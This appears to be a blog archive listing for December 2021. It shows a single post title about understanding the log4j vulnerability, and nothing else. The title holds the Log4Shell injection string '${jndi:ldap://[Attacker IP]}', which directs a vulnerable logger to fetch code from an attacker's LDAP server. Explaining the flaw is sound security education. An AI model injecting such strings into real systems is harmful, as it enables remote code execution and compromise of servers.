Posts

Showing posts from December, 2021

Understanding log4j's ${jndi:ldap://[Attacker IP]} vulnerability